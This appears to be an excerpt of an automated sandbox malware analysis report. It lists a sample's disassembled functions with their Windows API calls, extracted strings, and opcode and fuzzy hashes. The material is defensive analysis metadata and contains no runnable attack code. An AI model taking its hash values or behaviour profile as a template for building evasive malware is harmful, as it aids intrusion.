                                                          • Opcode Fuzzy Hash: 182759ea62d65811569ce99678e4b1c4dc90deef3154cd3171f5e21ea3360a43
                                                          • Instruction Fuzzy Hash: 40B17D74A00209ABDB16EF58C890EEEF7F9EF58304F148459FA459F691DB70E941CB60
                                                          Function 003AB038 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • __wcsnicmp.LIBCMT ref: 003AB0B9
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003AB182
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: a8bcc5ee70e4a0ef330712cf875caadce3bc9f562174d2aa8949fc15420776f7
                                                          • Instruction ID: 79e6044c68975d2300c2206d3b10779678903cbe7c889f205766cb98be99ee20
                                                          • Opcode Fuzzy Hash: a8bcc5ee70e4a0ef330712cf875caadce3bc9f562174d2aa8949fc15420776f7
                                                          • Instruction Fuzzy Hash: C7618175A00215AFCB16DF94C891EAEF7F8EF09310F11405AF956AB352DB70AE40CB90
                                                          Function 003888DA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: Oa5
                                                          • API String ID: 4104443479-2933034282
                                                          • Opcode ID: 502adf4fe4c50110a582b4a12e892e2c9841f351769f8db8e031da664f56df83
                                                          • Instruction ID: a17986cd1a9895ad811c90965ac231e91069361c8fe6dd4bf3f6c2c5944a93d9
                                                          • Opcode Fuzzy Hash: 502adf4fe4c50110a582b4a12e892e2c9841f351769f8db8e031da664f56df83
                                                          • Instruction Fuzzy Hash: 7B518EB0A00609DFCF26DF68C880AAEB7F5FF44304F558569E85AD7290EB30AD55CB51
                                                          Function 00352AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00352AC8
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00352AE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: eab56ec6c36384de4cdd9dc7b9b6a7b0edd16db07f331cf7ca50bfc8269e5062
                                                          • Instruction ID: fd7bc4ef3c361d7fd414dd0b66bf83540ee81ce788f1d4562bba9b802cddeabd
                                                          • Opcode Fuzzy Hash: eab56ec6c36384de4cdd9dc7b9b6a7b0edd16db07f331cf7ca50bfc8269e5062
                                                          • Instruction Fuzzy Hash: 705137724187449BD321AF10DC86BAFBBECFF84314F42885EF1D9591A2DB309529CB66
                                                          Function 003A97DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0034506B: __fread_nolock.LIBCMT ref: 00345089
                                                          • _wcscmp.LIBCMT ref: 003A98CD
                                                          • _wcscmp.LIBCMT ref: 003A98E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: 43239d71eec609deabdab81c69763a1e7065a9296a2ca41a625a5d8997ff8142
                                                          • Instruction ID: 706d70a214868c17ab13ec2c041fdca4f86378a94b25795838f6460eb45072a7
                                                          • Opcode Fuzzy Hash: 43239d71eec609deabdab81c69763a1e7065a9296a2ca41a625a5d8997ff8142
                                                          • Instruction Fuzzy Hash: 4241C571A00609BBDF229BA0CC85FEF77BDDF46710F00446AF900BB191DB75A90587A1
                                                          Function 003808CD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID: Dd@$Dd@
                                                          • API String ID: 1473721057-3375393111
                                                          • Opcode ID: 1b4f715cccc9394316f2ddf2c0f0d6abb775af197ee691cc7ae458f200a67132
                                                          • Instruction ID: ead584a8a7a1fd19f6afa04737065a2f6460e2161015aca430741c661b1abec0
                                                          • Opcode Fuzzy Hash: 1b4f715cccc9394316f2ddf2c0f0d6abb775af197ee691cc7ae458f200a67132
                                                          • Instruction Fuzzy Hash: FF513578608702CFD755DF19C180A1ABBF1BB99344F55885DE9868B321E331EC81CF82
                                                          Function 003B26A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003B26B4
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003B26EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 3b6506e514209f2bf68f8592670790582fe9b592ec68c14805539702f9209ae8
                                                          • Instruction ID: ce7965c2ddcb485ea05447eabb4d91027369bfcd7d840e09e14e2c5e413c2a3e
                                                          • Opcode Fuzzy Hash: 3b6506e514209f2bf68f8592670790582fe9b592ec68c14805539702f9209ae8
                                                          • Instruction Fuzzy Hash: F1310971800119AFCF02EFA4CC86EEEBFB9FF08314F104169F915AA166DB715A56DB60
                                                          Function 003C7AA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 003C7B93
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C7BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: f0d6fc425366f34932d99ed8e26a5ded945f5bd4a6fc511986cebecf7f475154
                                                          • Instruction ID: 00b5367426ffb5004f64275d445d86d68ad2d9c78ff23af3c9ee3943134005f8
                                                          • Opcode Fuzzy Hash: f0d6fc425366f34932d99ed8e26a5ded945f5bd4a6fc511986cebecf7f475154
                                                          • Instruction Fuzzy Hash: 2741E275A0520AAFDB15CF69C881BDABBB9FB09300F11416AED04EB391D731AD51CFA0
                                                          Function 003C6A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 003C6B49
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C6B85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 440da2556308c8d39c53decb8719fa0c1390e23444f66ba2c7811f80daf2af9e
                                                          • Instruction ID: f9201e6c22fa71d00f43920b3a199635de45c14665ba3f574040fe9f25e6d21a
                                                          • Opcode Fuzzy Hash: 440da2556308c8d39c53decb8719fa0c1390e23444f66ba2c7811f80daf2af9e
                                                          • Instruction Fuzzy Hash: 21316E71100604AEEB129F64CC81FFB73A9FF48724F11951DF999D7190DA31AC91D760
                                                          Function 003A2B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A2C09
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A2C44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: c8079c862993b5284617abf5419bfa4d7a55bc8b6c29c886e4195d7124047979
                                                          • Instruction ID: af92f4a81e4d690808ff7b61b1504f9620c75e24a07a77ebac3035fa9e38a78d
                                                          • Opcode Fuzzy Hash: c8079c862993b5284617abf5419bfa4d7a55bc8b6c29c886e4195d7124047979
                                                          • Instruction Fuzzy Hash: 4E31E6316003099FDB36CF5DD985BAFBBB9FF06360F154019ED85AA1A0E7709A40CB50
                                                          Function 003C6706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C6793
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C679E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 593c47377c9bbdebe7d38925ddd15ef97fda1fbef2982b42411e09f9b31db1cf
                                                          • Instruction ID: aff7f3b5a384d6de729bbfc8572a9c16cd3e3fef17c9090256a74cb63086e4c7
                                                          • Opcode Fuzzy Hash: 593c47377c9bbdebe7d38925ddd15ef97fda1fbef2982b42411e09f9b31db1cf
                                                          • Instruction Fuzzy Hash: 6E1186756001086FEF129F14CC81FBB37AEEB84368F11452DF954DB291D6319C618760
                                                          Function 003C6C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                            • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                            • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                          • GetWindowRect.USER32(00000000,?), ref: 003C6CA3
                                                          • GetSysColor.USER32(00000012), ref: 003C6CBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 6e83906f528322477b3d826230dc4271b56f03526fd0e0a5d3a8996114579a06
                                                          • Instruction ID: e856b3901df5402488b11a36c3c86db35a9741e8b4f5b6b48934fc8eabec7938
                                                          • Opcode Fuzzy Hash: 6e83906f528322477b3d826230dc4271b56f03526fd0e0a5d3a8996114579a06
                                                          • Instruction Fuzzy Hash: 1B212972510209AFDB05DFA8DC46EFA7BA9EB08314F01462DF995E3251D735E860DB50
                                                          Function 003C6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 003C69D4
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C69E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 042eea30b9458ded03458cddc2b135fa3f4c40b817d72fd898bcf02368e468fa
                                                          • Instruction ID: 150971d08aed153ad8a242b3309030f79c21a03aa6955386b58d1e2b31b816e5
                                                          • Opcode Fuzzy Hash: 042eea30b9458ded03458cddc2b135fa3f4c40b817d72fd898bcf02368e468fa
                                                          • Instruction Fuzzy Hash: 17112B71500204ABEB124E649C46FEB366EEB05368F514728FAA5D71D0C735AC919B61
                                                          Function 003A2CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A2D1A
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003A2D39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 376f28375461beada461217a9c0b70498487ec6b5c2d0bad02dfbb455dbec53e
                                                          • Instruction ID: 560c131c67e69620f62d9c25c05fb3a521808a8d8ab188e7df0812d19c3d9592
                                                          • Opcode Fuzzy Hash: 376f28375461beada461217a9c0b70498487ec6b5c2d0bad02dfbb455dbec53e
                                                          • Instruction Fuzzy Hash: 6311E631E01214ABCB22DB5CD844B9FB7AAEB17310F164121EC25AB2A1D730AE05CB95
                                                          Function 003B22EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003B2342
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003B236B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 31a55a0b810022c35ad3e43d0f449c845b1d4e5811c2ca29f11e6533597b597e
                                                          • Instruction ID: c5b08ffabf30ab809ad978fc59313fa02ab67823dbda126cc5945c5d8980e6c2
                                                          • Opcode Fuzzy Hash: 31a55a0b810022c35ad3e43d0f449c845b1d4e5811c2ca29f11e6533597b597e
                                                          • Instruction Fuzzy Hash: 3E11A378501625BEDB268F518C85EFBFBADEF05359F10432AF64956800D2746951C6F0
                                                          Function 00350A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C26,004052F8,?,?,?), ref: 00350ACE
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • _wcscat.LIBCMT ref: 00385010
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: S@
                                                          • API String ID: 257928180-58448795
                                                          • Opcode ID: 657fecbe7ac8d395f694533ed846c70823ffd07421cc9236ef5e1964a486e512
                                                          • Instruction ID: ca8cf1b44e996de340ad3a43350621d89d43b85eba2226f121535cb12ddcc464
                                                          • Opcode Fuzzy Hash: 657fecbe7ac8d395f694533ed846c70823ffd07421cc9236ef5e1964a486e512
                                                          • Instruction Fuzzy Hash: 5611A5359042089ACB46FB64DD42EDAB7F8EF08341B0040A6BD48DF1A0DB75EB888B55
                                                          Function 003990C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00399135
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 009a01b1a6dc796a385c1f8f54b559fd2a646c04c9fad11e2ee275a68c3794e4
                                                          • Instruction ID: d85b414b6b3c5c3795f1025ce1e6d1454718943685802aa653e804754f2c90c5
                                                          • Opcode Fuzzy Hash: 009a01b1a6dc796a385c1f8f54b559fd2a646c04c9fad11e2ee275a68c3794e4
                                                          • Instruction Fuzzy Hash: DF01F931A05215ABDF06EB68CC959FE7369FF06310B14061AF4715F2D2DA3568088750
                                                          Function 003A8E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 443f3568fcc2ccd95c11168738d7765dd6425963d2de896ab01318189518cf1d
